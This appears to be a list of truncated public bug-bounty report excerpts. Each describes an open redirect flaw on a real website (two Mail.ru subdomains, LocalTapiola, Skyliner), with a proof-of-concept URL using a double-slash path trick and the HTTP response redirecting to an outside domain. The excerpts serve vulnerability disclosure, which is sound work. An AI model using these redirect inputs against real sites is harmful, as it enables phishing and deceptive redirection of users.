Mail.ru: [ml.money.mail.ru] Open Redirect

PoC Только для неавторизованных пользователей без cookie Mpop https://ml.money.mail.ru//blackfan.ru HTTP Response HTTP/1.1 302 ... Location: //blackfan.ru?dmrrefresh=1...

LocalTapiola: Open Redirect (verkkopalvelu.lahitapiola.fi)

PoC: Open link and wait a full load https://verkkopalvelu.lahitapiola.fi//blackfan.ru/%2f../e2/kotivakuutus/vakuutuslaskuri/ Result: Redirect to another site - blackfan.ru Vulnerable script: https://verkkopalvelu.lahitapiola.fi/e2/kotivakuutus/vakuutuslaskuri/scripts/app.js js function ae...

Skyliner: [skyliner.io / qa.skyliner.io] Open Redirect

PoC https://skyliner.io//blackfan.ru/ https://qa.skyliner.io//blackfan.ru/ HTTP Response HTTP/1.1 301 Moved Permanently Content-Length: 0 Connection: close Date: Wed, 24 Aug 2016 17:30:39 GMT Location: //blackfan.ru https://cwe.mitre.org/data/definitions/601.html...

Mail.ru: [rabota.mail.ru] Open Redirect

PoC: http://rabota.mail.ru//blackfan.ru// HTTP Response: HTTP/1.1 301 Moved Permanently Server: nginx/1.7.10 Date: Mon, 07 Sep 2015 07:24:30 GMT Content-Length: 0 Connection: keep-alive Keep-Alive: timeout=60 Location: //blackfan.ru...